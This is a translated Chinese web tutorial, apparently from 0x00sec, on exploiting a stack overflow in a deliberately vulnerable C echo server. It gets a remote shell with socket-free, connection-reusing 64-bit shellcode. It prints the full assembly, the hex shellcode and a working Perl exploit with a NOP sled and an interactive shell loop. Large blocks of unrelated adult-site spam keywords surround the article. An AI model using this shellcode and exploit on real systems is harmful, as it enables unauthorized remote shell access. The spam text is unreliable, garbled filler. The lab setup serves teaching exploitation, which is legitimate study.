精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

遠程漏洞利用:無需借助套接字的Shellcode

安全 漏洞
在本文中,我將介紹一種優雅的技術,來獲得一個shell訪問易受攻擊的遠程機器。雖然這個技術不是我發明的,但我發現它的確很有趣,所以本文的重點是這種技術本身,而不是利用漏洞的具體方式。

前言

在本文中,我將介紹一種優雅的技術,來獲得一個shell訪問易受攻擊的遠程機器。雖然這個技術不是我發明的,但我發現它的確很有趣,所以本文的重點是這種技術本身,而不是利用漏洞的具體方式。

設置環境

為了專注于遠程shell代碼本身,而不是把精力用在如何規避ASLR、非可執行堆棧等防御措施上面,我們將禁用這些安全功能。一旦熟悉了獲取shellcode的方法,可以重新啟用這些保護措施,以進一步練習如何突破這些安全設置。因此,這是一個非常有趣的練習,如果你想練手的話。

首先,我們將禁用ASLR。為此,可以使用以下命令:

  1. echo 0 | sudo tee /proc/sys/kernel/randomize_va_space 

這些設置都是臨時性質的,在下次重新啟動時會全部還原。如果你想要在不重新啟動機器的情況下立即還原所有設置的話,可以使用如下所示的命令:

  1. echo 2 | sudo tee /proc/sys/kernel/randomize_va_space 

為了禁用其余的安全功能,我們可以使用以下選項來編譯帶有安全漏洞的服務器:

  1. -fno-stack-protector -z execstack 

這些選項會禁用堆棧的canarie保護,并賦予堆棧執行權限。這樣的話,我們就得到了一個非常容易利用的環境。

帶有安全漏洞的服務

現在,讓我們編寫一個帶有緩沖區溢出漏洞的小型回顯服務器,這樣我們就可以遠程利用它了。這個程序很簡單,你能發現代碼中的緩沖區溢出漏洞嗎? 你當然可以。

  1. #include <stdio.h> 
  2. #include <string.h> 
  3.    
  4. #include <sys/socket.h> 
  5. #include <netinet/in.h> 
  6. #include <arpa/inet.h> 
  7.    
  8. int 
  9. process_request (int s1, char *reply) 
  10.   char result[256]; 
  11.    
  12.   strcpy (result, reply); 
  13.   write (s1, result, strlen(result)); 
  14.   printf ("Result: %p\n", &result); 
  15.   return 0; 
  16.    
  17. int 
  18. main (int argc, char *argv[]) 
  19.   struct sockaddr_in   server, client; 
  20.   socklen_t            len = sizeof (struct sockaddr_in); 
  21.   int                  s,s1, ops = 1; 
  22.   char                 reply[1024]; 
  23.    
  24.   server.sin_addr.s_addr = INADDR_ANY; 
  25.   server.sin_family = AF_INET; 
  26.   server.sin_port = htons(9000); 
  27.    
  28.   s = socket (PF_INET, SOCK_STREAM, 0); 
  29.   if ((setsockopt (s, SOL_SOCKET, SO_REUSEADDR, &ops, sizeof(ops))) < 0) 
  30.     perror ("pb_server (reuseaddr):"); 
  31.   bind (s, (struct sockaddr *) &server, sizeof (server)); 
  32.   listen (s, 10); 
  33.    
  34.   while (1) 
  35.     { 
  36.       s1 = accept (s, (struct sockaddr *)&client, &len); 
  37.       printf ("Connection from %s\n", inet_ntoa (client.sin_addr)); 
  38.       memset (reply, 0, 1024); 
  39.       read (s1, reply, 1024); 
  40.       process_request (s1, reply); 
  41.       close (s1); 
  42.     } 
  43.   return 0; 

很好,下面我們就來編譯它,讓它變成一個最容易利用的服務器:

  1. gcc -g -fno-stack-protector -z execstack -o target target.c 

下面,我們來展示它的脆弱性。在一個終端運行這個帶有安全漏洞的服務器,然后在另一個終端運行下列命令:

  1. $ perl -e 'print "A"x1024;' | nc localhost 9000 

在運行服務器的終端中,我們將會看到如下所示的內容:

  1. $  ./target 
  2. Connection from 127.0.0.1 
  3. Result: 0x7fffffffdbf0 
  4. Segmentation fault (core dumped) 

注意,我已經添加了打印局部變量的地址的語句,從而可以驗證ASLR是否被禁用。每次執行這個二進制代碼的時候,應該總是看到相同的數字(當然,如果你修改了這個程序,數字就會隨之改變)。

現在,我們可以拿這個程序來練手,學習如何使用各種觸手可及的shellcode來獲取一個本地shell。盡管這個練習非常簡單,但是我們建議您至少要練習一次。具體過程本文不作詳細介紹,因為關于緩沖區溢出漏洞利用的教程,在網絡上面數不勝數。

遠程Shell

下面我們介紹如何獲取遠程shell。注意,這里的關鍵在于“遠程”。這意味著在易受攻擊的機器和攻擊者之間,隔著一個網絡。或者換句話說,我們必須通過一些套接字來發送/接收數據。根據這一要求,有兩種方式可以用來獲得遠程shell:

如果你的shellcode創建一個服務器套接字來啟用來自外部的連接請求,并從本地shell發送和接收數據 ...那么,這就是一個直接遠程shell。

如果你的shellcode連接回一個預先指定的主機,并且這個主機上運行的服務器軟件正在等待受害者的連接...那么,這就這是一個反向遠程shell。

關于這兩種遠程shell的詳細信息,請訪問https://0x00sec.org/t/remote-shells-part-i/269。

看到這兩個定義后,你可能會聯想到RHOST/RPORT之類的變量....是的,它們可以用來告訴payload連接的主機地址和相應的端口。對于反向shell來說,您必須將這些信息存放到payload中,以便連接回來。對于直接shell你通常需要定義端口,服務器就會等待連接。

但是,至少對于Unix機器來說,還有第三種選擇。

連接復用

當執行遠程漏洞利用代碼時,為了利用此漏洞,您已經連接到了服務器...所以,為什么不重用這個已經建立好的連接呢?這真是一個不錯的想法,因為它不會顯示任何會引起受害者懷疑的東西,例如來自服務器未知服務的開放端口等。

實現這一點的方法也非常巧妙。它是基于這樣的事實,即系統是按順序分配文件描述符的。知道了這一點,我們就可以在建立連接之后立即復制一個當前文件的描述符,除非服務器的負載很重,否則我們得到的文件描述符等于用于我們連接的套接字的文件描述符+1,這樣很容易就能知道我們的連接的文件描述符了。

一旦知道了當前連接的文件描述符,我們只需要將它復制到文件描述符0、1和2(stdin、stdout和stderr),就可以生成一個shell了。這樣一來,該shell的所有輸入/輸出都會被重定向到我們的套接字了。

還不明白嗎?肯定沒讀過https://0x00sec.org/t/remote-shells-part-i/269頁面上的文章吧?不過沒關系,現在去看也不晚。

相應的C代碼如下所示:

  1. int sck = dup (0) - 1; // Duplicate stdin 
  2. dup2 (sck, 0); 
  3. dup2 (sck, 1); 
  4. dup2  (sck, 2); 
  5. execv ("/bin/sh"NULL); 

看...根本就沒有使用套接字代碼!如果我們把它變成一個shellcode,并且設法利用遠程服務器的漏洞來運行該代碼,我們就能夠獲得一個shell來訪問遠程機器,而這個shell所使用的連接,正好就是原來向遠程服務器投遞利用代碼的那個連接。

當然,也你已經注意到這種技術存在一些缺點。就像我們所提到的那樣,如果服務器比較繁忙的話(同時建立許多連接),這種方法就很難奏效了。此外,正常的服務器會在變成守護進程之前關閉所有的文件描述符,因此我們可能需要嘗試使用其他值來推測文件描述符。

這個技術是前一段時間跟@_py進行討論的時候,由他想出來的。我們當時檢查的原始代碼可以在這里找到:

  1. http://shell-storm.org/shellcode/files/shellcode-881.php4 

但是,這是一個32位代碼,所以我重新制作了對應的64位版本,以及一個運行漏洞利用代碼的Perl腳本。

64位版本的Shellcode

下面的代碼您就將就著看吧(我這才發現自己的匯編技能真是生銹了),不過它確實可以正常運行,并且只比原來的32bits版本長了3個字節。我的64位版本的Shellcode如下所示:

  1. section .text 
  2. global _start 
  3. _start: 
  4.          ;; s = Dup (0) - 1 
  5.          xor rax, rax 
  6.          push rax 
  7.          push rax 
  8.          push rax 
  9.          pop rsi 
  10.          pop rdx 
  11.          push rax 
  12.          pop rdi 
  13.          mov al, 32 
  14.          syscall                  ; DUP (rax=32) rdi = 0 (dup (0)) 
  15.    
  16.          dec rax 
  17.          push rax 
  18.          pop rdi            ; mov rdi, rax  ; dec rdi 
  19.    
  20.          ;; dup2 (s, 0); dup2(s,1); dup2(s,2) 
  21. loop:        mov al, 33 
  22.          syscall                       ; DUP2 (rax=33) rdi=oldfd (socket) rsi=newfd 
  23.          inc rsi 
  24.          mov rax,rsi 
  25.          cmp al, 2          ; Loop 0,1,2 (stdin, stdout, stderr) 
  26.            
  27.          jne loop 
  28.    
  29.          ;; exec (/bin/sh) 
  30.          push    rdx                             ; NULL 
  31.          mov qword rdi, 0x68732f6e69622f2f    ; "//bin/sh" 
  32.          push         rdi                              ; command 
  33.          push        rsp                      
  34.          pop         rdi                       
  35.            
  36.          push        rdx            ;env 
  37.          pop         rsi             ;args 
  38.            
  39.         mov     al, 0x3b ;EXEC (rax=0x4b) rdi="/bin/sh" rsi=rdx= 
  40.         syscall 

對于不太容易理解的地方,我已經添加了相應的注釋。同時,你可能也注意到了,代碼里使用了許多的push/pop指令,這是因為一個PUSH/POP指令對占用2個字節,而MOV R1,R2指令則需要占用3個字節。雖然這會代碼變得非常丑,但是卻能節約一些空間...實際上也沒有節約太多的地方,所以也算不上一個好主意。無論如何,您可以隨意改進它,并歡迎在評論中發布您自己的版本。

生成Shellcode

現在,我們需要生成相應的shellcode,同時,其格式必須適合將其發送到遠程服務器才行。為此,我們首先需要編譯代碼,然后從編譯的文件中提取機器代碼。編譯代碼非常簡單,具體如下所示:

  1. nasm -f elf64 -o rsh.o rsh.asm 

當然,從目標文件中獲取二進制數據的方法有很多。我們這里使用的方法是生成具有易于添加到Perl或C程序中的格式的字符串。

  1. for i in $(objdump -d rsh.o -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done;echo 

上面的兩個命令將產生以下shellcode:

  1. \x48\x31\xc0\x50\x50\x50\x5e\x5a\x50\x5f\xb0\x20\x0f\x05\x48\xff\xc8\x50\x5f\xb0\x21\x0f\x05\x48\xff\xc6\x48\x89\xf0\x3c\x02\x75\xf2\x52\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x52\x5e\xb0\x3b\x0f\x05 

接下來,我們就需要開始編寫漏洞利用代碼了。

漏洞利用代碼

目前為止,我們已經搭設了一個帶有遠程利用漏洞的系統。同時,也了解了如何在低安全環境中利用緩沖區溢出漏洞,并生成了一個用于在遠程系統上運行的shellcode。現在我們需要一個漏洞利用代碼,把所有這些整合起來,從而獲得我們夢寐以求的遠程shell。

當然,編寫漏洞利用代碼的語言有很多,不過這里選用的是自己最熟悉的Perl。

我們的漏洞利用代碼具體如下所示:

  1. #!/usr/bin/perl 
  2. use IO::Select
  3. use IO::Socket::INET; 
  4. $|=1; 
  5.    
  6. print "Remote Exploit Example"
  7. print "by 0x00pf for 0x00sec :)\n\n"
  8.    
  9. # You may need to calculate these magic numbers for your system 
  10. $addr = "\x10\xdd\xff\xff\xff\x7f\x00\x00";  
  11. $off = 264; 
  12.    
  13. # Generate the payload 
  14. $shellcode = "\x48\x31\xc0\x50\x50\x50\x5e\x5a\x50\x5f\xb0\x20\x0f\x05\x48\xff\xc8\x50\x5f\xb0\x21\x0f\x05\x48\xff\xc6\x48\x89\xf0\x3c\x02\x75\xf2\x52\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x52\x5e\xb0\x3b\x0f\x05"
  15.    
  16. $nops = $off - length $shellcode; 
  17. $payload = "\x90" x $nops . $shellcode . $addr; 
  18.    
  19. $plen = length $payload; 
  20. $slen = length $shellcode; 
  21. print "SLED $nops Shellcode: $slen Payload size: $plen\n"
  22.    
  23. Connect 
  24. my $socket = new IO::Socket::INET ( 
  25.     PeerHost => '127.0.0.1'
  26.     PeerPort => '9000'
  27.     Proto => 'tcp'
  28.     ); 
  29. Set up select for asynchronous read from the server 
  30. $sel = IO::Select->new( $socket ); 
  31. $sel->add(\*STDIN); 
  32.    
  33. # Exploit! 
  34. $socket->send ($payload); 
  35. $socket->recv ($trash,1024); 
  36. $timeout = .1; 
  37.    
  38. $flag = 1; # Just to show a prompt 
  39.    
  40. # Interact! 
  41. while (1) { 
  42.     if (@ready = $sel->can_read ($timeout))  { 
  43.          foreach $fh (@ready) { 
  44.              $flag =1; 
  45.              if($fh == $socket) { 
  46.                   $socket->recv ($resp, 1024); 
  47.                   print $resp; 
  48.              } 
  49.              else { # It is stdin 
  50.                   $line = <STDIN>; 
  51.                   $socket->send ($line); 
  52.              } 
  53.          } 
  54.     }        
  55.     else { # Show the prompt whenever everything's been read 
  56.          print "0x00pf]>  " if ($flag); 
  57.          $flag = 0; 
  58.     }        

漏洞利用代碼的開頭部分幾乎是標準式的。接下來,根據您利用gdb找出的魔法數字來生成payload(請注意,在您的系統中這些數字可能會有所不同,這樣的話,這個漏洞利用代碼,在您的系統中,可能就會無法正常工作)。

然后,我們必須針對自己的遠程shell進行一些額外的工作。使用直接和反向shell時,一旦漏洞利用代碼執行完畢,我們通常需要使用另一個程序/模塊連接到遠程機器,或接收來自遠程機器的連接。為此,可以使用netcat或您喜歡的滲透測試平臺,甚至是自己專門編寫的工具...

但是,就本地而言,我們將使用已建立的連接來訪問shell,這個連接就是之前用來發送payload的那個。所以我添加了一些代碼,用來從stdin讀取命令,并將它們發送到遠程服務器,同時也從遠程shell讀取數據。這些都是些標準的網絡代碼,實在是沒有什么特別之處。

現在,你可以嘗試一下這個可以獲取遠程shell的漏洞利用代碼了!

小結

在本文中,我們討論了一種巧妙地技術,可以隱秘地獲取shell來遠程訪問易受攻擊的服務器,并且不需要跟系統提供的套接字API打交道。這使得shellcode的開發變得更簡單,也使其更簡潔(例如,你可以跟http://shell-storm.org/shellcode/files/shellcode-858.php2提供的代碼比較一番。

責任編輯:武曉燕 來源: 0x00sec.org
相關推薦

2016-09-29 14:37:39

ImageMagick漏洞分析

2023-10-07 08:00:00

JavaScriptHTMX

2020-10-28 14:58:21

漏洞uTorrent協議層

2009-02-19 15:29:19

2017-08-22 13:45:27

2022-05-06 18:55:29

Java技巧Shellcode

2010-07-06 15:33:10

UDP套接字

2020-10-16 10:30:28

黑客

2009-03-10 13:59:41

C#套接字編程

2014-12-11 09:20:30

TCP

2025-03-25 13:56:17

2010-09-17 16:23:53

分離捆綁后門

2015-03-13 19:15:06

2010-09-25 08:44:34

捆綁后門

2014-10-28 09:11:10

2009-08-26 09:48:48

C#異步套接字

2009-08-21 09:20:44

C#異步套接字

2021-02-05 15:20:06

網絡安全套接字命令

2022-06-06 14:17:15

零日漏洞惡意軟件網絡攻擊

2014-12-15 09:28:54

UDP
點贊
收藏

51CTO技術棧公眾號

日韩av在线发布| 国产中文字幕一区二区三区| 亚洲资源在线观看| 国外成人在线视频网站| 亚洲不卡在线视频| 日本久久黄色| 精品久久久久久久久久久久久久久 | 制服丝袜日韩国产| 又大又硬又爽免费视频| 国产人成在线视频| 国产精品一级片在线观看| 欧美中文字幕在线播放| 国产精品第七页| 日韩亚洲国产免费| 都市激情亚洲| 黄色片一区二区三区| 91久久偷偷做嫩草影院电| 亚洲国产视频在线| 色狠狠久久av五月综合|| 亚洲h视频在线观看| 欧美高清日韩| 欲色天天网综合久久| 逼特逼视频在线观看| 国内自拍亚洲| 日本黄色一区二区| 亚洲免费久久| 日韩a级作爱片一二三区免费观看| 国产日韩欧美高清免费| 久久久精品国产网站| 91精品人妻一区二区| 日韩精品中文字幕一区二区 | 欧美黑人激情| 欧美精品综合| 色偷偷噜噜噜亚洲男人| 免费在线观看成年人视频| 日韩中文字幕在线一区| 亚洲一区国产视频| 在线码字幕一区| 午夜精品一区二区三| 久久国内精品视频| 日韩女优人人人人射在线视频| 一级黄色片网址| 网红女主播少妇精品视频| 日韩色在线观看| 日本亚洲一区二区三区| 国产精品久久久久久久久久辛辛 | 国产激情一区二区三区四区 | 中文字幕观看av| 国产一区二区精品福利地址| 国产丝袜一区二区三区免费视频 | 国产91丝袜在线播放| 国产精品三级美女白浆呻吟| 无码一区二区三区| 麻豆精品91| 欧美亚洲第一区| 国产无码精品久久久| 国产一区二区三区四区五区传媒| 3d成人h动漫网站入口| 青青青在线视频免费观看| 亚洲男人av| 色诱亚洲精品久久久久久| 免费在线观看亚洲视频| 国产一二区在线观看| 成人欧美一区二区三区黑人麻豆 | 天堂网在线资源| 国产成人99久久亚洲综合精品| 国产成人精品在线视频| www.伊人久久| 男女激情视频一区| 成人免费视频网址| 超碰在线观看av| 北岛玲一区二区三区四区| 国产精品一区二区欧美黑人喷潮水 | 精彩国产在线| 久久精品人人做人人综合| 日本午夜精品电影 | 欧美v亚洲v综合ⅴ国产v| 好吊操视频这里只有精品| 91欧美极品| 亚洲欧美另类自拍| 成人18视频免费69| 国产中文精品久高清在线不| 少妇激情综合网| 午夜精品一区二区三区视频| 一区在线视频观看| 青青草精品毛片| 中日精品一色哟哟| 国产激情视频一区二区在线观看| 国产精品青青在线观看爽香蕉| 日韩免费视频网站| 日韩在线a电影| 国产成人一区二区| 国产高清视频免费观看| av欧美精品.com| 亚洲综合首页| 黄视频免费在线看| 精品视频999| 天堂在线资源视频| 日本免费一区二区视频| 91麻豆精品国产91久久久| 亚洲天堂2024| 日本一区二区免费高清| 午夜精品福利在线观看| japanese国产在线观看| 丁香啪啪综合成人亚洲小说 | 国产精品无码免费播放| 成人h精品动漫一区二区三区| 国产成人精品免费视频大全最热 | 日韩精品亚洲视频| 国产精品1区2区3区4区| 亚洲三级国产| 成人免费黄色网| 毛片免费在线观看| 亚洲一区在线观看网站| 另类小说第一页| 精品资源在线| 欧美另类在线观看| 欧美黄片一区二区三区| 菠萝蜜一区二区| 久久久久久久久网站| 国产一级做a爱免费视频| 狠狠88综合久久久久综合网| 国产精品偷伦视频免费观看国产 | 美女一区二区视频| 九九九九精品| av资源在线看片| 日韩一级视频免费观看在线| 久久中文字幕精品| 亚洲女同在线| 久久婷婷国产综合尤物精品| 视频在线这里都是精品| 福利视频一区二区| 年下总裁被打光屁股sp| 一区二区中文| 国产一区深夜福利| 超碰国产在线观看| 色一情一乱一乱一91av| 亚洲一区二区三区四区五区六区| 国产精品羞羞答答在线观看| 91精品国产高清自在线看超| www.五月天激情| 日韩美女视频一区二区| 免费国产黄色网址| 国产乱人伦精品一区| 欧美大片在线看免费观看| 国产丝袜视频在线观看| 综合激情成人伊人| 亚洲综合色在线观看| av中文一区| 欧美国产激情18| www.五月婷| 亚洲国产一二三| 中文字幕第38页| 青青草成人影院| 91国产精品91| 亚洲欧美色视频| 色欧美乱欧美15图片| 在线不卡av电影| 日本少妇一区二区| 亚洲一区不卡在线| 日本午夜大片a在线观看| 日韩精品高清在线观看| 成年人av网站| 国产精品传媒入口麻豆| 人妻少妇偷人精品久久久任期| 精品国产乱码久久久| 国产精品91一区| 婷婷视频在线| 欧美一级高清片| 潮喷失禁大喷水aⅴ无码| 久久电影网站中文字幕| 日韩不卡一二区| 黑人久久a级毛片免费观看| 91av成人在线| h视频在线播放| 欧美一区二区高清| 日韩精品一区二区三| 欧美激情一区二区三区全黄| 伊人精品视频在线观看| 一区二区视频欧美| 欧美国产综合视频| 国内精彩免费自拍视频在线观看网址| 91麻豆精品国产91久久久久| 久久精品99国产精| 99久久国产综合精品麻豆| 北条麻妃在线一区| 91精品99| 欧美精品久久| 国产欧美日韩电影| 久久人人爽人人爽人人片亚洲| 少妇又紧又色又爽又刺激视频 | 亚洲bt天天射| 1024在线看片你懂得| 国产午夜精品免费一区二区三区| 免费的毛片视频| 中文字幕一区在线| 一起草在线视频| 国产一区二区伦理| 99999精品视频| 伊人久久大香线蕉综合网蜜芽| 91精品国产乱码久久久久久久久| 成人免费观看在线视频| 91福利在线看| 免费三片在线播放| 国产日韩精品一区二区三区在线| 国产成人综合一区| 国产精品www.| 翔田千里亚洲一二三区| 国产另类在线| 亚洲自拍偷拍一区| 秋霞国产精品| 97超级碰碰碰久久久| 成人免费看片| 在线一区二区日韩| 日本一本草久在线中文| 精品捆绑美女sm三区| 日韩久久精品视频| 亚洲美女视频一区| 超碰97av在线| www国产成人免费观看视频 深夜成人网| 中国丰满人妻videoshd | 亚洲精品国产精品乱码在线观看| 肉肉av福利一精品导航| 欧美做暖暖视频| 91欧美大片| 亚洲一区二区精品在线观看| 国产精品欧美三级在线观看| 国产综合欧美在线看| 成人自拍av| 欧美怡春院一区二区三区| 成年人在线免费观看| 亚洲欧美精品伊人久久| 色一情一乱一区二区三区| 福利微拍一区二区| 日本黄色片视频| 亚洲高清免费视频| av网站免费在线看| 久久综合色播五月| 免费看黄色aaaaaa 片| 成人性生交大片免费看视频在线| 无人在线观看的免费高清视频| 欧美freesex交免费视频| 国产精品99久久久久久大便| 久久要要av| 自拍偷拍亚洲色图欧美| 天天久久综合| 潘金莲一级淫片aaaaa免费看| 小说区图片区色综合区| 精品国产第一页| 欧美日韩精品一区二区三区在线观看| 国产精品视频区| 久久不卡日韩美女| 91精品久久久久| 亚洲欧洲日本韩国| 欧美伊久线香蕉线新在线| 性欧美freesex顶级少妇| 欧美一区二区影院| 在线观看精品| 992tv成人免费视频| yellow91字幕网在线| 九九久久久久99精品| 色婷婷av在线| 欧美亚洲日本黄色| 日韩一区二区三区在线免费观看| 久久久人成影片一区二区三区| 在线免费观看黄色网址| 日韩视频永久免费观看| 18+视频在线观看| 久久久久日韩精品久久久男男| 黄色小网站在线观看| 欧美日韩国产123| 嗯~啊~轻一点视频日本在线观看| 美女国内精品自产拍在线播放| 久草视频视频在线播放| 色婷婷av一区二区三区久久| caoporn免费在线| 97免费视频在线| 国内老司机av在线| 欧美最猛黑人xxxx黑人猛叫黄| av成人影院在线| 国产成人鲁鲁免费视频a| v8888av| 欧一区二区三区| 国产精品推荐精品| 九热爱视频精品视频| 亚洲视频精品一区| 欧美天堂影院| 亚洲第一综合| 亚洲福利一区| 99re精彩视频| 日韩电影一二三区| 久久久福利影院| 久久综合五月天婷婷伊人| 国产高潮流白浆| 色婷婷国产精品| 性一交一乱一透一a级| 亚洲男人天堂2019| 在线看三级电影| 国产精品91久久久久久| 国产 日韩 欧美 综合 一区| 日韩欧美视频一区二区| 国产欧美日韩精品一区二区三区| 欧美精品一区二区三区久久| 亚洲字幕久久| 国产成人综合一区| 成人国产精品免费观看视频| 国产sm调教视频| 亚洲制服欧美中文字幕中文字幕| 九九视频在线观看| 日本韩国欧美国产| 精品毛片一区二区三区| 中文日韩在线视频| 不卡一二三区| 动漫精品视频| 亚洲欧美色图| 国产三级国产精品国产专区50| 精品一区二区在线播放| 欧洲av一区二区三区| 午夜伊人狠狠久久| jizz中国少妇| 自拍亚洲一区欧美另类| 亚洲男同gay网站| 国产欧美日韩中文| 国产99久久久国产精品成人免费 | 欧美 日韩 国产一区| 欧美激情麻豆| 亚洲男人天堂2021| 国产欧美精品一区二区色综合朱莉| 美女福利视频网| 欧美性xxxx极品hd欧美风情| 亚洲精品国产一区二| 欧美另类高清videos| 国产精品久久久久久久久久久久久久久 | www欧美在线观看| 亚洲精品国产一区| 狠狠躁日日躁夜夜躁av| 91福利在线免费观看| 水莓100在线视频| 日韩中文字幕在线观看| 欧美78videosex性欧美| 91丝袜美腿美女视频网站| 日韩欧美一区二区三区免费看| 日本一级黄视频| 国产精品996| 久久久国产精品人人片| 欧美一区二区三区四区在线观看 | 国内自拍中文字幕| 国内精品免费在线观看| 肉色超薄丝袜脚交69xx图片| 精品国产老师黑色丝袜高跟鞋| 中文字幕无线码一区| 一区二区欧美在线| 电影在线观看一区二区| 亚洲黄色成人久久久| 久久精品国产一区二区| 亚洲欧美综合7777色婷婷| 制服.丝袜.亚洲.中文.综合 | 色婷婷综合成人| 国产成+人+综合+亚洲欧美| 国产传媒欧美日韩| 伊人影院久久| 亚洲精品第三页| 亚洲日本中文字幕区| www.午夜激情| 午夜精品久久久久久久99热浪潮 | 日韩有码一区二区三区| 欧洲性xxxx| 777欧美精品| 波多野结依一区| 欧美大陆一区二区| 日日嗨av一区二区三区四区| 国产aaaaaaaaa| 日本道精品一区二区三区 | 黄色激情在线播放| 欧美一区二区综合| 一区二区三区四区五区精品视频| 中文字幕乱码在线人视频| 洋洋成人永久网站入口| 午夜视频在线免费播放| 国产福利视频一区| 偷拍欧美精品| 最近日本中文字幕| 欧美视频在线一区二区三区| 国产欧美久久久久久久久| 国产精品免费一区二区| 视频一区二区不卡| 中文字幕第4页| 制服丝袜中文字幕亚洲| 蜜桃视频m3u8在线观看| 精品国产免费久久久久久尖叫| 欧美日韩三级| 国偷自产av一区二区三区麻豆| 亚洲天堂久久久久久久| 国产又粗又猛又爽又黄视频 | 亚洲区欧洲区| 日韩欧美电影一二三| 青娱乐国产在线| 精品偷拍一区二区三区在线看| 激情在线视频播放| 99国产在线视频|